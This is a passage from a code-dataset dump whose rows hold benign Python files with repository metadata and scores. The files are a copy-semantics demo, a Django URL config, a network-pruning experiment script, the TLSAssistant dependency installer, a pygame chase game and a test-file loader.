'DATE', 'PLAYER_NAME', 'OWN_TEAM', 'OPP_TEAM', 'VENUE', 'MP', # 'TS%', 'eFG%', '3PAr', 'FTr', 'ORB%', 'DRB%', 'TRB%', 'AST%', # 'STL%', 'BLK%', 'TOV%', 'USG%', 'ORtg', 'DRtg' # ] # adv = adv[reordered_cols] | 2.910384 | 3 |
stdlib/copy_qs.py | bpuderer/python-snippets27 | 3 | 6616733 | <filename>stdlib/copy_qs.py
import copy
# shallow copy
lista = [0, 1, 2]
#listb = lista[:]
#listb = list(lista)
listb = copy.copy(lista)
lista.append(3)
print lista
print listb
print "---"
# deep copy
lista = [[0, 1], [2, 3], 4]
listb = copy.deepcopy(lista)
lista[0].append(5)
print lista
print listb
print "---"
# shallow copy
dicta = {'a': 0, 'b': 1}
#dictb = dict(dicta)
dictb = copy.copy(dicta)
dicta['c'] = 2
print dicta
print dictb
print "---"
# deep copy
dicta = {'a': {'aa': 0}, 'b': 1}
dictb = copy.deepcopy(dicta)
dicta['a']['aaa'] = 2
print dicta
print dictb
print "---"
| <filename>stdlib/copy_qs.py
import copy
# shallow copy
lista = [0, 1, 2]
#listb = lista[:]
#listb = list(lista)
listb = copy.copy(lista)
lista.append(3)
print lista
print listb
print "---"
# deep copy
lista = [[0, 1], [2, 3], 4]
listb = copy.deepcopy(lista)
lista[0].append(5)
print lista
print listb
print "---"
# shallow copy
dicta = {'a': 0, 'b': 1}
#dictb = dict(dicta)
dictb = copy.copy(dicta)
dicta['c'] = 2
print dicta
print dictb
print "---"
# deep copy
dicta = {'a': {'aa': 0}, 'b': 1}
dictb = copy.deepcopy(dicta)
dicta['a']['aaa'] = 2
print dicta
print dictb
print "---"
| pt | 0.143809 | # shallow copy #listb = lista[:] #listb = list(lista) # deep copy # shallow copy #dictb = dict(dicta) # deep copy | 3.45086 | 3 |
mysite/urls.py | Chris7/django-frontends | 0 | 6616734 | from django.conf.urls import patterns, include, url
from django.contrib import admin
from django.views.generic import TemplateView
from rest_framework import routers, serializers, viewsets
from polls.viewsets import ChoiceViewSet, PollViewSet
from polls.forms import ChoiceForm, PollForm
# Routers provide an easy way of automatically determining the URL conf.
router = routers.DefaultRouter()
router.register(r'poll', PollViewSet)
router.register(r'choice', ChoiceViewSet)
admin.autodiscover()
react_urls = patterns('',
url(r'^$', TemplateView.as_view(template_name='react/react.html'), {'poll_form': PollForm, 'choice_form': ChoiceForm}, name='react_index'),
)
urlpatterns = patterns('',
url(r'^polls/', include('polls.urls', namespace="polls")),
url(r'^admin/', include(admin.site.urls)),
url(r'^api/', include(router.urls, namespace='api')),
url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),
url(r'^react/', include(react_urls, namespace='react')),
) | from django.conf.urls import patterns, include, url
from django.contrib import admin
from django.views.generic import TemplateView
from rest_framework import routers, serializers, viewsets
from polls.viewsets import ChoiceViewSet, PollViewSet
from polls.forms import ChoiceForm, PollForm
# Routers provide an easy way of automatically determining the URL conf.
router = routers.DefaultRouter()
router.register(r'poll', PollViewSet)
router.register(r'choice', ChoiceViewSet)
admin.autodiscover()
react_urls = patterns('',
url(r'^$', TemplateView.as_view(template_name='react/react.html'), {'poll_form': PollForm, 'choice_form': ChoiceForm}, name='react_index'),
)
urlpatterns = patterns('',
url(r'^polls/', include('polls.urls', namespace="polls")),
url(r'^admin/', include(admin.site.urls)),
url(r'^api/', include(router.urls, namespace='api')),
url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),
url(r'^react/', include(react_urls, namespace='react')),
) | en | 0.449923 | # Routers provide an easy way of automatically determining the URL conf. | 1.945945 | 2 |
spp/main.py | namhoonlee/spp-public | 13 | 6616735 | <gh_stars>10-100
import os
import sys
import argparse
import tensorflow as tf
import json
from dataset import Dataset
from model import Model
import prune
import check
import train
import test
import approximate_isometry
def parse_arguments():
parser = argparse.ArgumentParser()
# General
parser.add_argument('--nruns', type=int, default=1, help='the number of times to run the program')
# Data
parser.add_argument('--path_data', type=str, default='path_to_datasets', help='location of data sets')
parser.add_argument('--datasource', type=str, default='mnist', help='data set to use')
parser.add_argument('--aug_kinds', nargs='+', type=str, default=[], help='augmentation kinds to perform')
# Model
parser.add_argument('--arch', type=str, default='mlp-7-linear', help='model architecture')
# Initialization
parser.add_argument('--init_w', type=json.loads, default={'kind': 'orthogonal'}, help='initializer for w')
parser.add_argument('--init_b', type=json.loads, default={'kind': 'zeros'}, help='initializer for b')
# Pruning
parser.add_argument('--target_sparsity', type=float, default=0.9, help='target sparsity')
parser.add_argument('--datasource_pruning', type=str, default='mnist', help='data set to use for transfer pruning')
parser.add_argument('--transfer_pruning', action='store_true', help='use separate datasource for pruning')
# Train
parser.add_argument('--batch_size', type=int, default=100, help='number of examples in the mini-batch')
parser.add_argument('--train_iterations', type=int, default=10000, help='number of training iterations')
parser.add_argument('--optimizer', type=str, default='sgd', help='optimizer of choice')
parser.add_argument('--learning_rate', type=float, default=1e-1, help='initial learning rate')
parser.add_argument('--decay_type', type=str, default='constant', help='learning rate decay type')
parser.add_argument('--decay_boundaries', nargs='+', type=int, default=[], help='boundaries for piecewise_constant decay')
parser.add_argument('--decay_values', nargs='+', type=float, default=[], help='values for piecewise_constant decay')
parser.add_argument('--check_interval', type=int, default=100, help='check interval during training')
parser.add_argument('--save_interval', type=int, default=1000, help='save interval during training')
# Test
parser.add_argument('--num_eval_checkpoints', type=int, default=20, help='number of checkpoints to evaluate')
parser.add_argument('--no_load_cache', action='store_true', help='do not allow loading cache in test mode')
# Dynamical isometry
parser.add_argument('--check_jsv', action='store_true', help='check jacobian singular values')
parser.add_argument('--enforce_isometry', action='store_true', help='enforce approximate dynamical isometry')
args = parser.parse_args()
return args
def main():
args = parse_arguments()
# Multiple runs
for run in range(args.nruns):
# Start
print('--\nStart run ({})'.format(run))
# Set paths
path_save = 'run-{}'.format(run)
path_keys = ['model', 'log', 'assess']
args.path = {key: os.path.join(path_save, key) for key in path_keys}
# Reset the default graph and set a graph-level seed
tf.reset_default_graph()
tf.set_random_seed(seed=run)
# Dataset
dataset = Dataset(**vars(args))
if args.transfer_pruning:
dataset_pruning = Dataset(args.datasource_pruning, args.path_data)
# Model
model = Model(**vars(args))
model.construct_model()
# Session
sess = tf.InteractiveSession()
# Initialization
tf.global_variables_initializer().run()
tf.local_variables_initializer().run()
_ = sess.run([model.weights_init], {model.init: True})
if args.check_jsv:
check.jacobian_singular_value(args, model, sess, dataset, 'after-init')
# Prune
prune.prune(args, model, sess, dataset_pruning if args.transfer_pruning else dataset)
if args.check_jsv:
check.jacobian_singular_value(args, model, sess, dataset, 'after-prune')
# Enforce approximate dynamical isometry in the sparse network
if args.enforce_isometry:
approximate_isometry.optimize(args, model, sess, dataset)
if args.check_jsv:
check.jacobian_singular_value(args, model, sess, dataset, 'after-isometry')
# Train and test
train.train(args, model, sess, dataset)
test.test(args, model, sess, dataset)
# Closing
sess.close()
print('--\nFinish run ({})'.format(run))
sys.exit()
if __name__ == "__main__":
main()
| import os
import sys
import argparse
import tensorflow as tf
import json
from dataset import Dataset
from model import Model
import prune
import check
import train
import test
import approximate_isometry
def parse_arguments():
parser = argparse.ArgumentParser()
# General
parser.add_argument('--nruns', type=int, default=1, help='the number of times to run the program')
# Data
parser.add_argument('--path_data', type=str, default='path_to_datasets', help='location of data sets')
parser.add_argument('--datasource', type=str, default='mnist', help='data set to use')
parser.add_argument('--aug_kinds', nargs='+', type=str, default=[], help='augmentation kinds to perform')
# Model
parser.add_argument('--arch', type=str, default='mlp-7-linear', help='model architecture')
# Initialization
parser.add_argument('--init_w', type=json.loads, default={'kind': 'orthogonal'}, help='initializer for w')
parser.add_argument('--init_b', type=json.loads, default={'kind': 'zeros'}, help='initializer for b')
# Pruning
parser.add_argument('--target_sparsity', type=float, default=0.9, help='target sparsity')
parser.add_argument('--datasource_pruning', type=str, default='mnist', help='data set to use for transfer pruning')
parser.add_argument('--transfer_pruning', action='store_true', help='use separate datasource for pruning')
# Train
parser.add_argument('--batch_size', type=int, default=100, help='number of examples in the mini-batch')
parser.add_argument('--train_iterations', type=int, default=10000, help='number of training iterations')
parser.add_argument('--optimizer', type=str, default='sgd', help='optimizer of choice')
parser.add_argument('--learning_rate', type=float, default=1e-1, help='initial learning rate')
parser.add_argument('--decay_type', type=str, default='constant', help='learning rate decay type')
parser.add_argument('--decay_boundaries', nargs='+', type=int, default=[], help='boundaries for piecewise_constant decay')
parser.add_argument('--decay_values', nargs='+', type=float, default=[], help='values for piecewise_constant decay')
parser.add_argument('--check_interval', type=int, default=100, help='check interval during training')
parser.add_argument('--save_interval', type=int, default=1000, help='save interval during training')
# Test
parser.add_argument('--num_eval_checkpoints', type=int, default=20, help='number of checkpoints to evaluate')
parser.add_argument('--no_load_cache', action='store_true', help='do not allow loading cache in test mode')
# Dynamical isometry
parser.add_argument('--check_jsv', action='store_true', help='check jacobian singular values')
parser.add_argument('--enforce_isometry', action='store_true', help='enforce approximate dynamical isometry')
args = parser.parse_args()
return args
def main():
args = parse_arguments()
# Multiple runs
for run in range(args.nruns):
# Start
print('--\nStart run ({})'.format(run))
# Set paths
path_save = 'run-{}'.format(run)
path_keys = ['model', 'log', 'assess']
args.path = {key: os.path.join(path_save, key) for key in path_keys}
# Reset the default graph and set a graph-level seed
tf.reset_default_graph()
tf.set_random_seed(seed=run)
# Dataset
dataset = Dataset(**vars(args))
if args.transfer_pruning:
dataset_pruning = Dataset(args.datasource_pruning, args.path_data)
# Model
model = Model(**vars(args))
model.construct_model()
# Session
sess = tf.InteractiveSession()
# Initialization
tf.global_variables_initializer().run()
tf.local_variables_initializer().run()
_ = sess.run([model.weights_init], {model.init: True})
if args.check_jsv:
check.jacobian_singular_value(args, model, sess, dataset, 'after-init')
# Prune
prune.prune(args, model, sess, dataset_pruning if args.transfer_pruning else dataset)
if args.check_jsv:
check.jacobian_singular_value(args, model, sess, dataset, 'after-prune')
# Enforce approximate dynamical isometry in the sparse network
if args.enforce_isometry:
approximate_isometry.optimize(args, model, sess, dataset)
if args.check_jsv:
check.jacobian_singular_value(args, model, sess, dataset, 'after-isometry')
# Train and test
train.train(args, model, sess, dataset)
test.test(args, model, sess, dataset)
# Closing
sess.close()
print('--\nFinish run ({})'.format(run))
sys.exit()
if __name__ == "__main__":
main() | en | 0.681309 | # General # Data # Model # Initialization # Pruning # Train # Test # Dynamical isometry # Multiple runs # Start # Set paths # Reset the default graph and set a graph-level seed # Dataset # Model # Session # Initialization # Prune # Enforce approximate dynamical isometry in the sparse network # Train and test # Closing | 2.296268 | 2 |
install.py | turbostar190/tlsassistant | 18 | 6616736 | import asyncio
import json
import sys
import aiohttp
import async_timeout
from zipfile import ZipFile
from os import path, geteuid, mkdir, sep, remove, devnull, environ
import subprocess
import argparse
import logging
from shutil import rmtree as rm_rf
# parser for the arguments
from utils.logger import Logger
parser = argparse.ArgumentParser(
description="Installer for TLSAssistant"
) # todo: edit the description of the tool
parser.add_argument(
"-v", "--verbose", help="Verbose mode.", action="store_true"
) # verbose flag
args = parser.parse_args() # parse arguments
logger = Logger("INSTALLER")
if args.verbose: # if verbose is set
logging.basicConfig(level=logging.DEBUG) # logger is set to debug
else:
logging.basicConfig(level=logging.INFO) # logger is set to info
class Install:
def __init__(self, dependencies): # constructor
gits = []
pkgs = []
zips = []
cfgs = []
apts = []
logger.info("Loading dependencies...")
for dependency in dependencies: # for each dependency
if dependency["type"] == "git": # if it's git
gits.append(dependency["url"]) # append it's url to the git array
logger.debug(f"Added dependency git {dependency['url']}")
elif dependency["type"] == "pkg": # if it's pkg
pkgs.append(dependency["url"]) # append it's url to the pkg array
logger.debug(f"Added dependency pkg {dependency['url']}")
elif dependency["type"] == "apt": # if it's zip
apts.append(dependency["url"]) # append it's url to the zip array
logger.debug(f"Added dependency apt {dependency['url']}")
elif dependency["type"] == "zip": # if it's zip
zips.append(dependency["url"]) # append it's url to the zip array
logger.debug(f"Added dependency zip {dependency['url']}")
elif dependency["type"] == "cfg": # if it's cfg
cfgs.append(dependency["url"]) # append it's url to the cfg array
logger.debug(f"Added dependency cfg {dependency['url']}")
else: # if not found, throw warning
logger.warning(
f"Ignoring dependency {dependency['url']}, type {dependency['type']} is not recognized."
)
logger.info("Getting files...")
logger.debug("Getting all cfgs...")
loop = asyncio.get_event_loop()
results_apts = apts
results_cfgs = loop.run_until_complete(self.download(cfgs))
logger.debug(results_cfgs)
logger.debug("Getting all pkgs...")
loop = asyncio.get_event_loop() # asnychronous event loop
results_pkgs = loop.run_until_complete(
self.download(pkgs)
) # download asynchronously all the files
logger.debug(results_pkgs)
logger.debug("Getting all zips...")
loop = asyncio.get_event_loop()
results_zips = loop.run_until_complete(self.download(zips))
logger.debug(results_zips)
logger.debug("Getting all git...")
for git in gits: # for each git url,
file_name = self.get_filename(git) # get the file name
logger.info(f"getting {file_name}...")
self.git_clone(git) # and clone it
logger.info(f"{file_name} done.")
logger.info("Installing dependencies...")
logger.warning(
"This may take a while... Rerun the tool with -v to see the detailed installation."
)
self.apt_update()
self.install_dependencies("pkgs", results_pkgs) # install the dependencies pkg
self.install_dependencies("apts", results_apts) # install the dependencies pkg
logger.info("Unzipping dependencies...")
self.install_dependencies("zips", results_zips) # unzips the zips
logger.info("Generating Certificates...")
self.generate_cert()
logger.info("All done!")
def generate_cert(self):
logger.debug("Generating certificates...")
mkdir(f"dependencies{sep}certificates") # create the folder
with open(devnull, "w") as null:
subprocess.check_call(
[
"openssl",
"req",
"-x509",
"-newkey",
"rsa",
"-keyout",
f"dependencies{sep}certificates{sep}localuser.key",
"-out",
f"dependencies{sep}certificates{sep}localuser.crt",
"-nodes",
"-batch",
"-subj",
"/CN=Local User",
],
stderr=(
sys.stderr
if logging.getLogger().isEnabledFor(
logging.DEBUG
) # if the user asked for debug mode, let him see the output.
else null # else /dev/null
),
stdout=(
sys.stdout
if logging.getLogger().isEnabledFor(
logging.DEBUG
) # if the user asked for debug mode, let him see the output.
else null # else /dev/null
),
)
def apt_update(self):
logger.debug("Updating repositories...")
with open(devnull, "w") as null:
subprocess.check_call(
["sudo", "apt-get", "update", "-y"],
stderr=sys.stderr,
stdout=(
sys.stdout
if logging.getLogger().isEnabledFor(
logging.DEBUG
) # if the user asked for debug mode, let him see the output.
else null # else /dev/null
),
)
def install_dependencies(self, type, results):
for file in results:
logger.info(f"Installing {file}...")
if type == "pkgs" or type == "apts":
logger.debug(f"Installing dependencies{sep}{file}")
f_path = f"./dependencies{sep}{file}"
with open(devnull, "w") as null:
subprocess.check_call(
[
"sudo",
"apt-get",
"install",
"-y",
f"{f_path if type == 'pkgs' else file}",
],
stderr=sys.stderr,
stdout=(
sys.stdout
if logging.getLogger().isEnabledFor(
logging.DEBUG
) # if the user asked for debug mode, let him see the output.
else null # else /dev/null
),
)
elif type == "zips":
logger.debug(f"Unzipping dependencies{sep}{file}")
with ZipFile(
f"dependencies{sep}{file}", "r"
) as zip: # while opening the zip
zip.extractall(
f"dependencies{sep}{file.rsplit('.', 1)[0]}"
) # extract it and remove the extension (myzip.zip) in the folder myzip
else: # if the type is not found, stop everything, we have an issue.
logger.error("no type found.")
raise AssertionError(
"The type given doesn't match one of the existing one."
)
if path.exists(
f"dependencies{sep}{file}"
): # delete the files .deb and .zip after all.
logger.debug(f"Removing file dependencies{sep}{file}")
remove(f"dependencies{sep}{file}")
def git_clone(self, url, path=None):
file_name = self.get_filename(url)
with open(devnull, "w") as null:
subprocess.call(
[
"git",
"clone",
str(url),
f"{path if path else 'dependencies' + sep + file_name}",
],
stderr=sys.stderr
if logging.getLogger().isEnabledFor(logging.DEBUG)
else null,
stdout=(
sys.stdout
if logging.getLogger().isEnabledFor(logging.DEBUG)
else null
),
)
async def get_url(self, url, session):
file_name = self.get_filename(url)
async with async_timeout.timeout(60):
async with session.get(url) as response:
with open(f"dependencies{sep}{file_name}", "wb") as fd:
async for data in response.content.iter_chunked(1024):
fd.write(data)
# logging.debug(f"Downloaded {url} in {file_name}")
return file_name
async def download(self, urls): # download asynchonously for faster downloads
async with aiohttp.ClientSession() as session:
tasks = [self.get_url(url, session) for url in urls] # load tasks
return await asyncio.gather(*tasks) # and gather them
def get_filename(self, url): # used to split and get the file name from http url
fragment_removed = url.split("#")[0]
query_string_removed = fragment_removed.split("?")[0]
scheme_removed = query_string_removed.split("://")[-1].split(":")[-1]
if scheme_removed.find("/") == -1:
return ""
return path.basename(scheme_removed)
def main(): # exec main
if not path.exists("dependencies"): # if can't find dependency folder
logger.debug("Folder dependencies does not exist. Creating a new one.")
else:
logger.debug("Folder dependencies exist. Removing and creating a new one.")
rm_rf("dependencies") # delete the folder
mkdir("dependencies") # create the folder
if path.exists("dependencies.json"): # if find the dependency file
with open("dependencies.json", "r") as dep: # load dependencies
data = dep.read()
dependencies = json.loads(data)
Install(dependencies) # install dependencies
else: # there's no file dependencies.json
logger.error("File not found, dependency links are missing. Abort.")
raise FileNotFoundError("File dependencies is not found, Abort.")
if __name__ == "__main__":
if geteuid() == 0 and not (
environ.get("TLSA_IN_A_DOCKER_CONTAINER", False)
): # check if sudo
logger.warning(
"Do not call the installer with SUDO, only some subprocess need SUDO."
)
logger.warning(
"By doing this you will install the entire dependencies on root."
)
input("If you want to continue, press Enter. Press CTRL+C to abort.")
main()
| import asyncio
import json
import sys
import aiohttp
import async_timeout
from zipfile import ZipFile
from os import path, geteuid, mkdir, sep, remove, devnull, environ
import subprocess
import argparse
import logging
from shutil import rmtree as rm_rf
# parser for the arguments
from utils.logger import Logger
parser = argparse.ArgumentParser(
description="Installer for TLSAssistant"
) # todo: edit the description of the tool
parser.add_argument(
"-v", "--verbose", help="Verbose mode.", action="store_true"
) # verbose flag
args = parser.parse_args() # parse arguments
logger = Logger("INSTALLER")
if args.verbose: # if verbose is set
logging.basicConfig(level=logging.DEBUG) # logger is set to debug
else:
logging.basicConfig(level=logging.INFO) # logger is set to info
class Install:
def __init__(self, dependencies): # constructor
gits = []
pkgs = []
zips = []
cfgs = []
apts = []
logger.info("Loading dependencies...")
for dependency in dependencies: # for each dependency
if dependency["type"] == "git": # if it's git
gits.append(dependency["url"]) # append it's url to the git array
logger.debug(f"Added dependency git {dependency['url']}")
elif dependency["type"] == "pkg": # if it's pkg
pkgs.append(dependency["url"]) # append it's url to the pkg array
logger.debug(f"Added dependency pkg {dependency['url']}")
elif dependency["type"] == "apt": # if it's zip
apts.append(dependency["url"]) # append it's url to the zip array
logger.debug(f"Added dependency apt {dependency['url']}")
elif dependency["type"] == "zip": # if it's zip
zips.append(dependency["url"]) # append it's url to the zip array
logger.debug(f"Added dependency zip {dependency['url']}")
elif dependency["type"] == "cfg": # if it's cfg
cfgs.append(dependency["url"]) # append it's url to the cfg array
logger.debug(f"Added dependency cfg {dependency['url']}")
else: # if not found, throw warning
logger.warning(
f"Ignoring dependency {dependency['url']}, type {dependency['type']} is not recognized."
)
logger.info("Getting files...")
logger.debug("Getting all cfgs...")
loop = asyncio.get_event_loop()
results_apts = apts
results_cfgs = loop.run_until_complete(self.download(cfgs))
logger.debug(results_cfgs)
logger.debug("Getting all pkgs...")
loop = asyncio.get_event_loop() # asnychronous event loop
results_pkgs = loop.run_until_complete(
self.download(pkgs)
) # download asynchronously all the files
logger.debug(results_pkgs)
logger.debug("Getting all zips...")
loop = asyncio.get_event_loop()
results_zips = loop.run_until_complete(self.download(zips))
logger.debug(results_zips)
logger.debug("Getting all git...")
for git in gits: # for each git url,
file_name = self.get_filename(git) # get the file name
logger.info(f"getting {file_name}...")
self.git_clone(git) # and clone it
logger.info(f"{file_name} done.")
logger.info("Installing dependencies...")
logger.warning(
"This may take a while... Rerun the tool with -v to see the detailed installation."
)
self.apt_update()
self.install_dependencies("pkgs", results_pkgs) # install the dependencies pkg
self.install_dependencies("apts", results_apts) # install the dependencies pkg
logger.info("Unzipping dependencies...")
self.install_dependencies("zips", results_zips) # unzips the zips
logger.info("Generating Certificates...")
self.generate_cert()
logger.info("All done!")
def generate_cert(self):
logger.debug("Generating certificates...")
mkdir(f"dependencies{sep}certificates") # create the folder
with open(devnull, "w") as null:
subprocess.check_call(
[
"openssl",
"req",
"-x509",
"-newkey",
"rsa",
"-keyout",
f"dependencies{sep}certificates{sep}localuser.key",
"-out",
f"dependencies{sep}certificates{sep}localuser.crt",
"-nodes",
"-batch",
"-subj",
"/CN=Local User",
],
stderr=(
sys.stderr
if logging.getLogger().isEnabledFor(
logging.DEBUG
) # if the user asked for debug mode, let him see the output.
else null # else /dev/null
),
stdout=(
sys.stdout
if logging.getLogger().isEnabledFor(
logging.DEBUG
) # if the user asked for debug mode, let him see the output.
else null # else /dev/null
),
)
def apt_update(self):
logger.debug("Updating repositories...")
with open(devnull, "w") as null:
subprocess.check_call(
["sudo", "apt-get", "update", "-y"],
stderr=sys.stderr,
stdout=(
sys.stdout
if logging.getLogger().isEnabledFor(
logging.DEBUG
) # if the user asked for debug mode, let him see the output.
else null # else /dev/null
),
)
def install_dependencies(self, type, results):
for file in results:
logger.info(f"Installing {file}...")
if type == "pkgs" or type == "apts":
logger.debug(f"Installing dependencies{sep}{file}")
f_path = f"./dependencies{sep}{file}"
with open(devnull, "w") as null:
subprocess.check_call(
[
"sudo",
"apt-get",
"install",
"-y",
f"{f_path if type == 'pkgs' else file}",
],
stderr=sys.stderr,
stdout=(
sys.stdout
if logging.getLogger().isEnabledFor(
logging.DEBUG
) # if the user asked for debug mode, let him see the output.
else null # else /dev/null
),
)
elif type == "zips":
logger.debug(f"Unzipping dependencies{sep}{file}")
with ZipFile(
f"dependencies{sep}{file}", "r"
) as zip: # while opening the zip
zip.extractall(
f"dependencies{sep}{file.rsplit('.', 1)[0]}"
) # extract it and remove the extension (myzip.zip) in the folder myzip
else: # if the type is not found, stop everything, we have an issue.
logger.error("no type found.")
raise AssertionError(
"The type given doesn't match one of the existing one."
)
if path.exists(
f"dependencies{sep}{file}"
): # delete the files .deb and .zip after all.
logger.debug(f"Removing file dependencies{sep}{file}")
remove(f"dependencies{sep}{file}")
def git_clone(self, url, path=None):
file_name = self.get_filename(url)
with open(devnull, "w") as null:
subprocess.call(
[
"git",
"clone",
str(url),
f"{path if path else 'dependencies' + sep + file_name}",
],
stderr=sys.stderr
if logging.getLogger().isEnabledFor(logging.DEBUG)
else null,
stdout=(
sys.stdout
if logging.getLogger().isEnabledFor(logging.DEBUG)
else null
),
)
async def get_url(self, url, session):
file_name = self.get_filename(url)
async with async_timeout.timeout(60):
async with session.get(url) as response:
with open(f"dependencies{sep}{file_name}", "wb") as fd:
async for data in response.content.iter_chunked(1024):
fd.write(data)
# logging.debug(f"Downloaded {url} in {file_name}")
return file_name
async def download(self, urls): # download asynchonously for faster downloads
async with aiohttp.ClientSession() as session:
tasks = [self.get_url(url, session) for url in urls] # load tasks
return await asyncio.gather(*tasks) # and gather them
def get_filename(self, url): # used to split and get the file name from http url
fragment_removed = url.split("#")[0]
query_string_removed = fragment_removed.split("?")[0]
scheme_removed = query_string_removed.split("://")[-1].split(":")[-1]
if scheme_removed.find("/") == -1:
return ""
return path.basename(scheme_removed)
def main(): # exec main
if not path.exists("dependencies"): # if can't find dependency folder
logger.debug("Folder dependencies does not exist. Creating a new one.")
else:
logger.debug("Folder dependencies exist. Removing and creating a new one.")
rm_rf("dependencies") # delete the folder
mkdir("dependencies") # create the folder
if path.exists("dependencies.json"): # if find the dependency file
with open("dependencies.json", "r") as dep: # load dependencies
data = dep.read()
dependencies = json.loads(data)
Install(dependencies) # install dependencies
else: # there's no file dependencies.json
logger.error("File not found, dependency links are missing. Abort.")
raise FileNotFoundError("File dependencies is not found, Abort.")
if __name__ == "__main__":
if geteuid() == 0 and not (
environ.get("TLSA_IN_A_DOCKER_CONTAINER", False)
): # check if sudo
logger.warning(
"Do not call the installer with SUDO, only some subprocess need SUDO."
)
logger.warning(
"By doing this you will install the entire dependencies on root."
)
input("If you want to continue, press Enter. Press CTRL+C to abort.")
main()
| en | 0.826901 | # parser for the arguments # todo: edit the description of the tool # verbose flag # parse arguments # if verbose is set # logger is set to debug # logger is set to info # constructor # for each dependency # if it's git # append it's url to the git array # if it's pkg # append it's url to the pkg array # if it's zip # append it's url to the zip array # if it's zip # append it's url to the zip array # if it's cfg # append it's url to the cfg array # if not found, throw warning # asnychronous event loop # download asynchronously all the files # for each git url, # get the file name # and clone it # install the dependencies pkg # install the dependencies pkg # unzips the zips # create the folder # if the user asked for debug mode, let him see the output. # else /dev/null # if the user asked for debug mode, let him see the output. # else /dev/null # if the user asked for debug mode, let him see the output. # else /dev/null # if the user asked for debug mode, let him see the output. # else /dev/null # while opening the zip # extract it and remove the extension (myzip.zip) in the folder myzip # if the type is not found, stop everything, we have an issue. # delete the files .deb and .zip after all. # logging.debug(f"Downloaded {url} in {file_name}") # download asynchonously for faster downloads # load tasks # and gather them # used to split and get the file name from http url # exec main # if can't find dependency folder # delete the folder # create the folder # if find the dependency file # load dependencies # install dependencies # there's no file dependencies.json # check if sudo | 2.094399 | 2 |
collisiondetection/collisiondetection.py | BhanuPrakashNani/physics-simulation | 7 | 6616737 | from pygame import *
size_x = 1200
size_y = 700
class Object:
def disp(self, screen):
screen.blit(self.sprite, self.rect)
class Bad (Object):
def __init__(self):
self.sprite= image.load("police (1).bmp")
self.rect = self.sprite.get_rect()
self.rect.centerx = size_x / 2
self.rect.centery = size_y / 2
def chase(self, mouse):
if self.rect.centerx > S.rect.centerx:
self.rect.centerx-=10
if self.rect.centerx< S.rect.centerx:
self.rect.centerx+= 10
if self.rect.centery > S.rect.centery:
self.rect.centery-= 10
if self.rect.centery< S.rect.centery:
self.rect.centery+= 10
class gameover (Object):
def __init__(self):
self.sprite= image.load("projectgameover.bmp")
self.rect= self.sprite.get_rect()
self.rect.centerx=500
self.rect.centery=500
class Ship(Object):
def __init__(self):
self.sprite = image.load("car project.bmp")
self.rect = self.sprite.get_rect()
self.rect.centerx = 100
self.rect.centery = 100
def cycle (self):
self.rect.centerx, self.rect.centery=mouse.get_pos()
class shot(Object):
def __init__(self):
self.sprite = image.load("car project.bmp")
self.rect = self.sprite.get_rect()
self.rect.centerx=100
self.rect.centery=100
def cycle (self):
self.rect.centerx = S.rect.centerx
self.rect.centery = S.rect.centery-(S.sprite.get_width()/2)
for e in event.get():
if e.type==KEYDOWN:
if e.key==K_SPACE:
self.rect.centery-=10
init()
screen = display.set_mode((size_x, size_y))
B = Bad()
S = Ship()
g= gameover()
shot=shot()
clock = time.Clock()
while True:
for e in event.get():
if e.type == QUIT:
quit()
B.chase(S)
S.cycle()
shot.cycle()
screen.fill((255,255,255))
screen=display.set_mode((size_x,size_y))
screen=display.set_mode((size_x,size_y))
background=image.load("background (1).bmp")
background=transform.scale(background,(size_x,size_y))
screen.blit(background,(0,0))
S.disp(screen)
B.disp(screen)
shot.disp(screen)
display.flip()
clock.tick(60)
| from pygame import *
size_x = 1200
size_y = 700
class Object:
def disp(self, screen):
screen.blit(self.sprite, self.rect)
class Bad (Object):
def __init__(self):
self.sprite= image.load("police (1).bmp")
self.rect = self.sprite.get_rect()
self.rect.centerx = size_x / 2
self.rect.centery = size_y / 2
def chase(self, mouse):
if self.rect.centerx > S.rect.centerx:
self.rect.centerx-=10
if self.rect.centerx< S.rect.centerx:
self.rect.centerx+= 10
if self.rect.centery > S.rect.centery:
self.rect.centery-= 10
if self.rect.centery< S.rect.centery:
self.rect.centery+= 10
class gameover (Object):
def __init__(self):
self.sprite= image.load("projectgameover.bmp")
self.rect= self.sprite.get_rect()
self.rect.centerx=500
self.rect.centery=500
class Ship(Object):
def __init__(self):
self.sprite = image.load("car project.bmp")
self.rect = self.sprite.get_rect()
self.rect.centerx = 100
self.rect.centery = 100
def cycle (self):
self.rect.centerx, self.rect.centery=mouse.get_pos()
class shot(Object):
def __init__(self):
self.sprite = image.load("car project.bmp")
self.rect = self.sprite.get_rect()
self.rect.centerx=100
self.rect.centery=100
def cycle (self):
self.rect.centerx = S.rect.centerx
self.rect.centery = S.rect.centery-(S.sprite.get_width()/2)
for e in event.get():
if e.type==KEYDOWN:
if e.key==K_SPACE:
self.rect.centery-=10
init()
screen = display.set_mode((size_x, size_y))
B = Bad()
S = Ship()
g= gameover()
shot=shot()
clock = time.Clock()
while True:
for e in event.get():
if e.type == QUIT:
quit()
B.chase(S)
S.cycle()
shot.cycle()
screen.fill((255,255,255))
screen=display.set_mode((size_x,size_y))
screen=display.set_mode((size_x,size_y))
background=image.load("background (1).bmp")
background=transform.scale(background,(size_x,size_y))
screen.blit(background,(0,0))
S.disp(screen)
B.disp(screen)
shot.disp(screen)
display.flip()
clock.tick(60)
| none | 1 | 3.089789 | 3 | |
baygon/description.py | heig-tin-info/baygon | 1 | 6616738 | """
Read and validate test file.
"""
import yaml
import json
import os
from collections.abc import Sequence
from . import schema, Executable
def check_executable(executable: Executable, filters=None):
if executable and not isinstance(executable, Executable):
raise AttributeError('Not an instance of Executable')
if executable and filters:
executable.filters = filters
return executable
def find_testfile(path=None):
"""Recursively find the tests description file."""
if not path:
path = os.path.dirname(os.path.realpath('.'))
if not os.path.isdir(path):
raise ValueError(f"Path name '{path}' is not a directory")
for filename in ['baygon', 't', 'test', 'tests']:
for ext in ['json', 'yml', 'yaml']:
f = os.path.join(path, f"{filename}.{ext}")
if os.path.exists(f):
return f
# Recursively search in parent directories
if os.path.dirname(path) != path: # Test if root directory
return find_testfile(os.path.dirname(path))
def load(filename):
"""Load a configuration file (can be YAML or JSON)."""
def loadYaml(filename):
with open(filename) as fp:
return yaml.load(fp, Loader=yaml.FullLoader)
def loadJson(filename):
with open(filename) as fp:
return json.load(fp)
extension = os.path.splitext(filename)[1]
if extension in ['.yml', '.yaml']:
return loadYaml(filename)
if extension in ['.json']:
return loadJson(filename)
